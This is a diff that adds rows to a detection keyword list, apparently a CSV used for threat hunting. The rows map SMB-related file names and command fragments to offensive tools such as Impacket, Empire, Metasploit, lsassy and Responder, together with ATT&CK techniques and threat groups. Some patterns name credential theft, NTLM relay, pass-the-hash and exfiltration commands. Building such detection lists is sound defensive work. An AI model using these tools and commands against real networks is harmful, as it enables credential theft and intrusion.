+"*smb_rras_erraticgopher.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_shadow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_shadow.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_stealth.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*smb_win.py*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z"
+"*smb1_anonymous_connect_ipc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*smb1_anonymous_login*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*-smb2support --remove-mic --shadow-credentials --shadow-target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smbattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*smbattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*smbcrawler*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z"
+"*SMBeagle.exe*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*SMBeagle.sln*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*smbeagle_*_linux_amd64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*smbeagle_*_linux_arm64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*smbeagle_*_win_x64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*smbenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
+"*SMBetray*","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","4","382","97","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z"
+"*-SMBExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*smbexec.py -hashes :*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smbexec.py -share*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smbexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*SMBGhost.pcap*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z"
+"*smbmap -*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*smbmap -u guest -H *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smbmap.py *","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*smbmap.smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*smbmap-master*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*SMBNTLMResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*smbpasswd.py -newpass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*smbpasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*SMBRelay.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*SMBRelayChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*smbrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*smbrelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
